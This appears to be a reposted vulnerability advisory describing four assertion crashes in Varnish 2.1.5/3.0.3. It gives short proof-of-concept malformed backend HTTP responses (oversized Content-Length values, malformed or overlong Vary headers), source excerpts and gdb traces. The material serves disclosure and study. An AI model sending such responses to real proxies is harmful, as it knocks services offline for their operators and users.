首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Varnish 2.1.5 / 3.0.3 Denial Of Service
来源:vfocus.net 作者:AKAT-1 发布时间:2013-03-08  
#######################################
# STV_alloc()       |  ((st) != NULL) #
#######################################
#
# Authors:
#
# 22733db72ab3ed94b5f8a1ffcde850251fe6f466
# c8e74ebd8392fda4788179f9a02bb49337638e7b
# AKAT-1
#
#######################################

# Versions: 2.1.5
# Full panic message:
#

Panic message: Assert error in STV_alloc(), stevedore.c line 192:#012  Condition((st) != NULL) not true.



## Summary:
Varnish 2.1.5 crash and restart (via assert) while parsing Content-Length: header (backend response).
This could be used if attacker gained access to backed systems (for example injecting HTTP headers
in buggy web application), or when backend system is not managed by the same entity as the varnish
proxy.



POC(response):
-- cut --
HTTP/1.1 200 OK
Content-Length: 2147483647


-- cut --


# Brief and unfinished pointers on what happens here : 

core:
153 struct storage *
154 STV_alloc(struct sess *sp, size_t size, struct objcore *oc)
155 {
156   struct storage *st;
157   struct stevedore *stv = NULL;
158   unsigned fail = 0;
159 
160   /*
161    * Always try the stevedore which allocated the object in order to
162    * not needlessly split an object across multiple stevedores.
163    */
164   if (sp->obj != NULL) {
165     CHECK_OBJ_NOTNULL(sp->obj, OBJECT_MAGIC);
166     if (sp->obj->objstore != NULL) {
167       stv = sp->obj->objstore->stevedore;
168       CHECK_OBJ_NOTNULL(stv, STEVEDORE_MAGIC);
169     }
170   }
171 
172   for (;;) {
173     if (stv == NULL) {
174       stv = stv_pick_stevedore();
175       fail = 0;
176     }
177 
178     /* try to allocate from it */
179     AN(stv->alloc);
180     st = stv->alloc(stv, size, oc);
181     if (st != NULL)
182       break;
183 
184     /* no luck; try to free some space and keep trying */
185     if (EXP_NukeOne(sp, stv->lru) == -1)
186       break;
187 
188     /* Enough is enough: try another if we have one */
189     if (++fail == 50)
190       stv = NULL;
191   }
192   CHECK_OBJ_NOTNULL(st, STORAGE_MAGIC);
193   return (st);
194 }


Assertion from line 192 fails as STORAGE_MAGIC is defined as :
cache.h line 276:
-- cut --
#define STORAGE_MAGIC   0x1a4e51c0
-- cut --

while the CHECK_OBJ_NOTNULL macro (include/miniobj.h ) is defined 
as :

#define CHECK_OBJ_NOTNULL(ptr, type_magic)        \
  do {                \
    assert((ptr) != NULL);          \
    assert((ptr)->magic == type_magic);     \
  } while (0)


and st is NULL when it reaches the macro as 
180     st = stv->alloc(stv, size, oc);

stv structure is declared in stevandore.h as follows :

-- cut --
struct stevedore {
  unsigned    magic;
#define STEVEDORE_MAGIC   0x4baf43db
  const char    *name;
  storage_init_f    *init;  /* called by mgt process */
  storage_open_f    *open;  /* called by cache process */
  storage_alloc_f   *alloc;
  storage_trim_f    *trim;
  storage_free_f    *free;
  storage_object_f  *object;
  storage_close_f   *close;

  struct lru    *lru;

  /* private fields */
  void      *priv;

  VTAILQ_ENTRY(stevedore) list;
};
-- cut --

so after the second pass when it tries to allocate it , it calls 

180     st = stv->alloc(stv, size, oc);

at which point st is cleared to 0x0
alloc is a function pointer to storage_alloc_f
$1 = (storage_alloc_f *) 0x44a29a <smf_alloc>
smf_alloc is in turn defined in storage_file.c 

Breakpoint 2, smf_alloc (st=0x7f5b34e48080, size=2147483647, oc=0x0) at storage_file.c:463
(gdb) info args
st = 0x7f5b34e48080
size = 2147483647
oc = 0x0


in smf_alloc though it calls alloc_smf , where it gets 0
so it returns NULL

│471             smf = alloc_smf(sc, size);
│472             if (smf == NULL) {
│473                     Lck_Unlock(&sc->mtx);
│474                     return (NULL);
│475             }  


alloc_smf :

│231             struct smf *sp, *sp2;
..


(gdb) macro expand VTAILQ_FOREACH(sp, &sc->free[NBUCKET -1], status)
expands to: for ((sp) = (((&sc->free[(128 / 4 + 1) -1]))->vtqh_first); (sp); (sp) = (((sp))->status.vtqe_next))



basically while it cycles through this linked list, it reaches
(gdb) p sp->size
$13 = 798867456
(gdb) nexti
(gdb) p sp->size
$14 = 798875648


delta = 8192

(gdb) p sp->size
$20 = 798875648
(gdb) nexti
(gdb) p sp->size
$21 = 798871552

delta  = -4096

(gdb) p sp->size
$24 = 798871552
(gdb) nexti
(gdb) p sp->size
$25 = 798875648


delta = 4096

one of the sp->status->vtsq_next must be null

sc is some kind of allocator divided into free and used :

Breakpoint 1, alloc_smf (sc=0x7f2d5424a300, bytes=2147483648) at storage_file.c:234
234   assert(!(bytes % sc->pagesize));
(gdb) p *sc
$1 = {filename = 0x7f2d5421f040 "/tmp/dsdsd", fd = 3, pagesize = 4096, filesize = 6390988800, order = {
    vtqh_first = 0x7f2d54205a80, vtqh_last = 0x7f2d542055b8}, free = {{vtqh_first = 0x0, vtqh_last = 0x7f2d5424a328}, 
    {vtqh_first = 0x0, vtqh_last = 0x7f2d5424a338}, {vtqh_first = 0x0, vtqh_last = 0x7f2d5424a348}, {
      vtqh_first = 0x0, vtqh_last = 0x7f2d5424a358}, {vtqh_first = 0x0, vtqh_last = 0x7f2d5424a368}, {
      vtqh_first = 0x0, vtqh_last = 0x7f2d5424a378}, {vtqh_first = 0x0, vtqh_last = 0x7f2d5424a388}, {
      vtqh_first = 0x0, vtqh_last = 0x7f2d5424a398}, {vtqh_first = 0x0, vtqh_last = 0x7f2d5424a3a8}, {
      vtqh_first = 0x0, vtqh_last = 0x7f2d5424a3b8}, {vtqh_first = 0x0, vtqh_last = 0x7f2d5424a3c8}, {
      vtqh_first = 0x0, vtqh_last = 0x7f2d5424a3d8}, {vtqh_first = 0x0, vtqh_last = 0x7f2d5424a3e8}, {
      vtqh_first = 0x0, vtqh_last = 0x7f2d5424a3f8}, {vtqh_first = 0x0, vtqh_last = 0x7f2d5424a408}, {
      vtqh_first = 0x0, vtqh_last = 0x7f2d5424a418}, {vtqh_first = 0x0, vtqh_last = 0x7f2d5424a428}, {
      vtqh_first = 0x0, vtqh_last = 0x7f2d5424a438}, {vtqh_first = 0x0, vtqh_last = 0x7f2d5424a448}, {
      vtqh_first = 0x0, vtqh_last = 0x7f2d5424a458}, {vtqh_first = 0x0, vtqh_last = 0x7f2d5424a468}, {
      vtqh_first = 0x0, vtqh_last = 0x7f2d5424a478}, {vtqh_first = 0x0, vtqh_last = 0x7f2d5424a488}, {
      vtqh_first = 0x0, vtqh_last = 0x7f2d5424a498}, {vtqh_first = 0x0, vtqh_last = 0x7f2d5424a4a8}, {
      vtqh_first = 0x0, vtqh_last = 0x7f2d5424a4b8}, {vtqh_first = 0x0, vtqh_last = 0x7f2d5424a4c8}, {
      vtqh_first = 0x0, vtqh_last = 0x7f2d5424a4d8}, {vtqh_first = 0x0, vtqh_last = 0x7f2d5424a4e8}, {
      vtqh_first = 0x0, vtqh_last = 0x7f2d5424a4f8}, {vtqh_first = 0x0, vtqh_last = 0x7f2d5424a508}, {
      vtqh_first = 0x0, vtqh_last = 0x7f2d5424a518}, {vtqh_first = 0x7f2d54205540, vtqh_last = 0x7f2d54205b08}}, 
  used = {vtqh_first = 0x7f2d4c50c0c0, vtqh_last = 0x7f2d4c50c148}, mtx = {priv = 0x7f2d542205e0}}
(gdb) 
EOF

=====================================================

######################################
# VRY_Create()      |   (*q == ',')  #
######################################
#
# Authors:
#
# 22733db72ab3ed94b5f8a1ffcde850251fe6f466
# c8e74ebd8392fda4788179f9a02bb49337638e7b
# AKAT-1
#
#######################################

## Versions affected:
3.0.3
2.1.5

## Summary:
Varnish 2.1.5 and 3.0.3 crash and restart (via assert) while parsing Vary header (backend response).
This could be used if attacker gained access to backed systems (for example injecting HTTP headers
in buggy web application), or when backend system is not managed by the same entity as the varnish 
proxy.



## PoC (response from backend):
-- cut --
HTTP/1.1 200 OK
Vary: a a


-- cut --



##  PoC (request):
 -- cut --
GET / HTTP/1.1
Host: foo

 -- cut --



## Details:
Varnish 2.1.5)
  child pid will crash with the following message:
  "Panic message: Missing errorhandling code in VRY_Create(), cache_vary.c line 128:#012  Condition(*q == ',') not true."

Varnish 3.0.3)
  child pid will crash with the followin message:
  "Condition(*q == ',') not true.thread = (cache-worker)#012ident = Linux,3.2.0-4-amd64,x86_64,-smalloc,-smalloc,-hcritbit,epoll#012Backtrace:#"



# Brief and unfinished pointers on what happens here (based on 2.1.5) :

   The 'q' variable (90 line) is a pointer to 1st character of the 'Vary'
   header value, which is 'a' from POC. The 'for' loop (90 line) then
   checks if the 'q' isn't space and ','. If it is, then increments the
   'q'. The 2nd iteration makes 'q' pointing at ' ' from POC. The 'while'
   loop (118 line) then skips spaces incrementing 'q', thus 'q' points
   at 'b' from POC, which is obviously != '\0' (120 line). Finaly 'q'
   is != ',' so the assert is triggered (122 line).


    include/vas.h:
    57 #define xxxassert(e)                                                    \
    58 do {                                                                    \
    59         if (!(e))                                                       \
    60                 VAS_Fail(__func__, __FILE__, __LINE__, #e, errno, 1);   \
    61 } while (0)


    bin/varnishd/cache_vary.c:
    62  struct vsb *
    63  VRY_Create(const struct sess *sp, const struct http *hp)
    64  {
    65          char *v, *p, *q, *h, *e;
    66          struct vsb *sb, *sbh;
    67          unsigned l;
    68
    69          /* No Vary: header, no worries */
    70          if (!http_GetHdr(hp, H_Vary, &v))
    71                  return (NULL);
    72
    73          /* For vary matching string */
    74          sb = VSB_new_auto();
    75          AN(sb);
    76
    77          /* For header matching strings */
    78          sbh = VSB_new_auto();
    79          AN(sbh);
    80
    81          if (*v == ':') {
    82                  WSP(sp, SLT_Error, "Vary header had extra ':', fix backend");
    83                  v++;
    84          }
    85          for (p = v; *p; p++) {
    86
    87                  /* Find next header-name */
    88                  if (vct_issp(*p))
    89                          continue;
    90                  for (q = p; *q && !vct_issp(*q) && *q != ','; q++)
    91                          continue;
    92
    93                  /* Build a header-matching string out of it */
    94                  VSB_clear(sbh);
    95                  VSB_printf(sbh, "%c%.*s:%c",
    96                      (char)(1 + (q - p)), (int)(q - p), p, 0);
    97                  AZ(VSB_finish(sbh));
    98
    99                  if (http_GetHdr(sp->http, VSB_data(sbh), &h)) {
    100                         AZ(vct_issp(*h));
    101                         /* Trim trailing space */
    102                         e = strchr(h, '\0');
    103                         while (e > h && vct_issp(e[-1]))
    104                                 e--;
    105                         /* Encode two byte length and contents */
    106                         l = e - h;
    107                         assert(!(l & ~0xffff));
    108                 } else {
    109                         e = h;
    110                         l = 0xffff;
    111                 }
    112                 VSB_printf(sb, "%c%c", (int)(l >> 8), (int)(l & 0xff));
    113                 /* Append to vary matching string */
    114                 VSB_bcat(sb, VSB_data(sbh), VSB_len(sbh));
    115                 if (e != h)
    116                         VSB_bcat(sb, h, e - h);
    117
    118                 while (vct_issp(*q))
    119                         q++;
    120                 if (*q == '\0')
    121                         break;
    122                 xxxassert(*q == ',');
    123                 p = q;
    124         }

EOF

=====================================================

##############################################
# http_GetHdr()     | (l == strlen(hdr + 1)) #
##############################################
#
# Authors:
#
# 22733db72ab3ed94b5f8a1ffcde850251fe6f466
# c8e74ebd8392fda4788179f9a02bb49337638e7b
# AKAT-1
#
##############################################

# Versions: 3.0.3, 2.1.5


# Summary: 
It's possible to crash Varnish (via assertion) if the single header within the Vary header is longer then 127 bytes.

The 'l' (cache_http.c#265) is the length of the given header name passed in a 'Vary' header and stored in the 'vsb' structure (vsb.h#39).
It's compared with the strlen() of the same header name in the diagnostic() call (cache_http.c#266), which is a macro to assert() (include/vas.h#68).
Because header name was stored in the 'vsb' as a signed char (cache_vary.c#98), the maximum value for 'l' is 127. If the header name is equal
or larger than this value (which is the case for strlen()), the assert() is called and the child is killed with the SIGABRT.

PoC (response)
-- cut --
HTTP/1.1 200 foo
Vary: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa


-- cut --

varnish-3.0.3/bin/varnishd/cache_vary.c:
-- cut --
 95         /* Build a header-matching string out of it */
 96         VSB_clear(sbh);
 97         VSB_printf(sbh, "%c%.*s:%c",
 98             (char)(1 + (q - p)), (int)(q - p), p, 0);
 99         AZ(VSB_finish(sbh));
100
101         if (http_GetHdr(sp->http, VSB_data(sbh), &h)) {
-- cut --

varnish-3.0.3/bin/varnishd/cache_http.c:
-- cut --
 260 http_GetHdr(const struct http *hp, const char *hdr, char **ptr)
 261 {
 262     unsigned u, l;
 263     char *p;
 264
 265     l = hdr[0];
 266     diagnostic(l == strlen(hdr + 1));
 267     assert(hdr[l] == ':');
-- cut --
EOF

=====================================================

###############################################
# fetch_straight()  |  ((uintmax_t)cl == cll) #
###############################################
#
# Authors:
#
# 22733db72ab3ed94b5f8a1ffcde850251fe6f466
# c8e74ebd8392fda4788179f9a02bb49337638e7b
# AKAT-1
#
#######################################

# Versions: 2.1.5
# Summary
It is possible to crash (via assert) varnish child processes by sending invalid Content-Length reponse header.

* Panic message: Assert error in fetch_straight(), cache_fetch.c line 65:#012 Condition((uintmax_t)cl == cll) not true.

POC(response):
 -- cut --
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: 99999999999999999


-- cut --
EOF

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Samsung TV Denial Of Service
·Squid 3.x Denial Of Service
·SIP Witch 0.7.4 Denial Of Serv
·ALLMediaServer 0.94 SEH Overfl
·Subversion 1.6.17 Denial Of Se
·Firebird Relational Database C
·Raspberry Pi rpi-update Local
·SCADA 3S CoDeSys Gateway Serve
·Viscosity setuid-set Viscosity
·VLC Player 2.0.x (.mp3) <= Mem
·Setuid Tunnelblick Privilege E
·Windows Media Player 10.0.0.38
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved